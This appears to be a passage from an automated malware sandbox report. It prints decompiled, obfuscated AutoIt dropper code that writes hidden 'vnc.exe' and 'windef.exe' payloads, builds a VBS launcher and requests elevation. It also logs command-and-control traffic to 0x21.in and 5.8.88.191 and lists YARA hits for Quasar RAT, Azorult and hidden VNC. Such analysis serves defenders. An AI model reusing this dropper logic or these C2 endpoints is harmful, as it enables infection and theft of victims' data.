$FUBZ8NTGJ3 = 394063 FOR $E = 0 TO 3045587 IF $658599975 = 323312849 THEN $URLOPEN = FILEOPEN ($URLPATH , "2" ) RANDOM (521480 ) $658599975 = 967842408 ENDIF IF $658599975 = 648664962 THEN FILEWRITE ($URLOPEN , $URLCONTENT ) EXITLOOP ISSTRING ("cGl8IYf26K" ) ENDIF IF $658599975 = 708304020 THEN FILEWRITE ($VBSOPEN , $VBS ) ISSTRING (686503 + 725473 + 1222023 * 2017236 ) $658599975 = 648664962 ENDIF IF $658599975 = 813318089 THEN LOCAL $TRIPLE = CHR ("34" ) & CHR ("34" ) & CHR ("34" ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $VBSOPEN = FILEOPEN ($VBSPATH , "2" ) ISSTRING ("XSqLLcGAD0roOZkCgtGva6rV9GZGo41qhasCXRiCMUHAW0Qr3aSt6RS0zELfmalI9ahNGRQzleSpy19i0HMom" ) $658599975 = 813318089 CHR (1241107 ) ENDIF IF $658599975 = 1944260330 THEN LOCAL $VBS = "Set WshShell = WScript.CreateObject(" & CHR ("34" ) & "WScript.Shell" & CHR ("34" ) & ") " & @CR & "WshShell.Run " & $TRIPLE & $FULLPATH & $TRIPLE $658599975 = 708304020 RANDOM (1809451 ) ENDIF DIM $VMUSH28BAIEDOOX6WBQR = "eNxuiYfRzyozZXz44zBB1aEWKYKoLLaebRQH679d3" NEXT ENDIF GLOBAL $708304020 = 323312849 GLOBAL $BJQDZ17CCC = 2981910 FOR $E = 0 TO 944417 IF $708304020 = 323312849 THEN LOCAL $HANDLEARRAY = [$URLOPEN , 
$VBSOPEN , $OPENFILE , $HFILE ] $708304020 = 967842408 INT (835559 ) PTR ("xig276zxHh9uFGxUq" ) ENDIF IF $708304020 = 813318089 THEN FILESETATTRIB ($FULLPATH , $ATTRIB ) RANDOM (3384109 ) $708304020 = 1944260330 ISBINARY ("nO1cOmUhQrUffFL0RveYfn6CJFOzsL4ECKTVGEBWJx" ) RANDOM (709510 ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($HFILE , $BINARY ) $708304020 = 813318089 ENDIF IF $708304020 = 1944260330 THEN FILESETATTRIB ($SOXGWLGCUOVMJM , $ATTRIB ) INT (3974479 ) EXITLOOP ISSTRING ("tZewpMDX0tl3roRwZCybbdsGd63tTcicsnpIWTUHaZFQ28qvJM34ehGqFGttTjdYkj" ) ENDIF RANDOM (506822 ) NEXT FOR $I = "0" TO UBOUND ($HANDLEARRAY ) - "1" FILECLOSE ($HANDLEARRAY [$I ] ) NEXT ENDFUNC FUNC GETDIR ($INDEX ) GLOBAL $813318089 = 323312849 GLOBAL $GT0ALHLOEO = 2332845 FOR $E = 0 TO 2173231 DIM $7KR9DPYZZ0VSFTXMXBCW = 745899 + 456920 + 2887456 IF $813318089 = 323312849 THEN LOCAL $DIRS = [@TEMPDIR , @APPDATADIR , @SCRIPTDIR ] MOD (2599250 , 760383 ) $813318089 = 967842408 DIM $V8ETRSBKZZF5RBJREWCT = 250402 + 4293885267 + 1539338 + 3085217 ENDIF IF $813318089 = 967842408 THEN RETURN $DIRS [$INDEX - "1" ] PTR ("G81yxSf2m643X6Hlbh3q3Bv9S56GGxTLWFySKV4vrkGhCxvBLJKt5WReM2RBWHuYmrgrGZ" ) EXITLOOP MOD (2162431 , 3953781 ) ENDIF MOD (2105889 , 1303155 ) NEXT ENDFUNC FUNC REMOVEZONEID () FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) ENDFUNC REMOVEZONEID () KHOCWHDEQXMSTFPOADRL ("runas" ) LOCAL $GBCNYUEOGFONFLBWF = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("AppXDeploymentExtensions.desktop1" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF &= DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("Eap3Host2" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF = DBRUAIEIBZEWRGBQ ($GBCNYUEOGFONFLBWF , "sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub" ) ASAZRREHKGLB () AJJMOCPPKFEWODWKA () $SOXGWLGCUOVMJM = @USERPROFILEDIR & "\btpanui" KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("fmweecwytels" , "vnc.exe" , TRUE , FALSE , 1 ) KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("qhdokzqjbkdd" , "windef.exe" , TRUE , FALSE , 1 ) 
$KNHRXQUZAIDARCYAAKVJDJTPD = @SCRIPTFULLPATH MWMQWLZFSVGLEKEBWPKTQCNGY ($KNHRXQUZAIDARCYAAKVJDJTPD , "" , $GBCNYUEOGFONFLBWF , FALSE ) MIVVMSGJPNONEWUB ("SystemPropertiesPerformance.exe" , "RtkAudioService64" , "+HR" , TRUE ) WHILE TRUE TLRQDAKNGKXFDWQNVSPQPWUUICTCP () WEND LLBUPLMSHANIDLHCMEMP ()

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                        Sep 29, 2021 01:36:07.384537935 CEST  49743        8000       192.168.2.4   50.17.5.224
                                        Sep 29, 2021 01:36:07.987818956 CEST  8000         49743      50.17.5.224   192.168.2.4
                                        Sep 29, 2021 01:36:07.987917900 CEST  49743        8000       192.168.2.4   50.17.5.224
                                        Sep 29, 2021 01:36:07.988516092 CEST  49743        8000       192.168.2.4   50.17.5.224
                                        Sep 29, 2021 01:36:08.991806030 CEST  8000         49743      50.17.5.224   192.168.2.4
                                        Sep 29, 2021 01:36:09.985110998 CEST  49744        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:10.010328054 CEST  80           49744      208.95.112.1  192.168.2.4
                                        Sep 29, 2021 01:36:10.010624886 CEST  49744        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:10.011471987 CEST  49744        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:10.037458897 CEST  80           49744      208.95.112.1  192.168.2.4
                                        Sep 29, 2021 01:36:10.079448938 CEST  49744        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:14.900573015 CEST  49744        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:18.400753975 CEST  49745        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:20.030541897 CEST  49746        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:20.056447983 CEST  80           49746      208.95.112.1  192.168.2.4
                                        Sep 29, 2021 01:36:20.056561947 CEST  49746        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:20.062109947 CEST  49746        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:20.087898016 CEST  80           49746      208.95.112.1  192.168.2.4
                                        Sep 29, 2021 01:36:20.158437967 CEST  49746        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:36:21.471038103 CEST  49745        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:22.907526016 CEST  49747        443        192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:22.907576084 CEST  443          49747      5.8.88.191    192.168.2.4
                                        Sep 29, 2021 01:36:22.907756090 CEST  49747        443        192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:27.471576929 CEST  49745        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:44.489223957 CEST  49750        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:47.662820101 CEST  49750        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:48.004627943 CEST  49747        443        192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:36:48.004652977 CEST  443          49747      5.8.88.191    192.168.2.4
                                        Sep 29, 2021 01:36:53.770750046 CEST  49750        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:04.783417940 CEST  80           49746      208.95.112.1  192.168.2.4
                                        Sep 29, 2021 01:37:04.783525944 CEST  49746        80         192.168.2.4   208.95.112.1
                                        Sep 29, 2021 01:37:10.835088968 CEST  49751        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:13.006927967 CEST  49747        443        192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:13.006956100 CEST  443          49747      5.8.88.191    192.168.2.4
                                        Sep 29, 2021 01:37:13.897594929 CEST  49751        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:18.747024059 CEST  80           49746      208.95.112.1  192.168.2.4
                                        Sep 29, 2021 01:37:19.898145914 CEST  49751        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:37.024944067 CEST  49752        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:38.009067059 CEST  49747        443        192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:38.009095907 CEST  443          49747      5.8.88.191    192.168.2.4
                                        Sep 29, 2021 01:37:40.165508032 CEST  49752        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:37:46.166199923 CEST  49752        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:38:03.105066061 CEST  49747        443        192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:38:03.105103016 CEST  443          49747      5.8.88.191    192.168.2.4
                                        Sep 29, 2021 01:38:03.183374882 CEST  49753        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:38:06.214675903 CEST  49753        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:38:12.215255022 CEST  49753        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:38:13.171844006 CEST  49754        8080       192.168.2.4   5.8.88.191
                                        Sep 29, 2021 01:38:16.168715954 CEST  49754        8080       192.168.2.4   5.8.88.191

                                        UDP Packets

                                        Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                        Sep 29, 2021 01:35:49.361951113 CEST  54531        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:35:49.380501032 CEST  53           54531      8.8.8.8       192.168.2.4
                                        Sep 29, 2021 01:35:55.125516891 CEST  58028        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:35:55.143276930 CEST  53           58028      8.8.8.8       192.168.2.4
                                        Sep 29, 2021 01:35:55.282685995 CEST  53097        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:35:55.311024904 CEST  53           53097      8.8.8.8       192.168.2.4
                                        Sep 29, 2021 01:36:07.160135031 CEST  49257        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:36:07.359210014 CEST  53           49257      8.8.8.8       192.168.2.4
                                        Sep 29, 2021 01:36:09.943180084 CEST  62389        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:36:09.955970049 CEST  53           62389      8.8.8.8       192.168.2.4
                                        Sep 29, 2021 01:36:19.977479935 CEST  49910        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:36:19.990183115 CEST  53           49910      8.8.8.8       192.168.2.4
                                        Sep 29, 2021 01:36:40.032248020 CEST  55854        53         192.168.2.4   8.8.8.8
                                        Sep 29, 2021 01:36:40.061148882 CEST  53           55854      8.8.8.8       192.168.2.4

                                        DNS Queries

                                        Timestamp                             Source IP    Dest IP   Trans ID  OP Code             Name        Type            Class
                                        Sep 29, 2021 01:36:07.160135031 CEST  192.168.2.4  8.8.8.8   0x4ffa    Standard query (0)  0x21.in     A (IP address)  IN (0x0001)
                                        Sep 29, 2021 01:36:09.943180084 CEST  192.168.2.4  8.8.8.8   0xdbd4    Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)
                                        Sep 29, 2021 01:36:19.977479935 CEST  192.168.2.4  8.8.8.8   0x2afc    Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)

                                        DNS Answers

                                        Timestamp                             Source IP    Dest IP       Trans ID  Reply Code    Name        CName  Address       Type            Class
                                        Sep 29, 2021 01:36:07.359210014 CEST  8.8.8.8      192.168.2.4   0x4ffa    No error (0)  0x21.in     -      50.17.5.224   A (IP address)  IN (0x0001)
                                        Sep 29, 2021 01:36:09.955970049 CEST  8.8.8.8      192.168.2.4   0xdbd4    No error (0)  ip-api.com  -      208.95.112.1  A (IP address)  IN (0x0001)
                                        Sep 29, 2021 01:36:19.990183115 CEST  8.8.8.8      192.168.2.4   0x2afc    No error (0)  ip-api.com  -      208.95.112.1  A (IP address)  IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 0x21.in:8000
                                        • ip-api.com

                                        HTTP Packets

                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        0           192.168.2.4  49743        50.17.5.224     8000              C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Timestamp                             kBytes transferred  Direction  Data
                                        Sep 29, 2021 01:36:07.988516092 CEST  942                 OUT        POST /_az/ HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Host: 0x21.in:8000
                                        Content-Length: 101
                                        Cache-Control: no-cache
                                        Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32
                                        Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        1           192.168.2.4  49744        208.95.112.1    80                C:\Users\user\AppData\Local\Temp\windef.exe
                                        Timestamp                             kBytes transferred  Direction  Data
                                        Sep 29, 2021 01:36:10.011471987 CEST  942                 OUT        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Sep 29, 2021 01:36:10.037458897 CEST  943                 IN         HTTP/1.1 200 OK
                                        Date: Tue, 28 Sep 2021 23:36:09 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 278
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        2           192.168.2.4  49746        208.95.112.1    80                C:\Users\user\AppData\Local\Temp\windef.exe
                                        Timestamp                             kBytes transferred  Direction  Data
                                        Sep 29, 2021 01:36:20.062109947 CEST  944                 OUT        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Sep 29, 2021 01:36:20.087898016 CEST  944                 IN         HTTP/1.1 200 OK
                                        Date: Tue, 28 Sep 2021 23:36:20 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 278
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 49
                                        X-Rl: 42
                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}


                                        Code Manipulations

                                        Statistics

                                        CPU Usage


                                        Memory Usage


                                        High Level Behavior Distribution


                                        Behavior


                                        System Behavior

                                        General

                                        Start time: 01:35:55
                                        Start date: 29/09/2021
                                        Path: C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Wow64 process (32bit): true
                                        Commandline: 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
                                        Imagebase: 0xdb0000
                                        File size: 2111264 bytes
                                        MD5 hash: B0B78DA613422BE0DE8DE2E2A2D0CE68
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:01:36:03
                                        Start date:29/09/2021
                                        Path:C:\Users\user\AppData\Local\Temp\vnc.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\vnc.exe'
                                        Imagebase:0xab0000
                                        File size:415232 bytes
                                        MD5 hash:B8BA87EE4C3FC085A2FED0D839AADCE1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 84%, Virustotal, Browse
                                        • Detection: 93%, ReversingLabs
                                        Reputation:moderate

                                        General

                                        Start time:01:36:04
                                        Start date:29/09/2021
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\svchost.exe -k
                                        Imagebase:0x7ff6eb840000
                                        File size:51288 bytes
                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
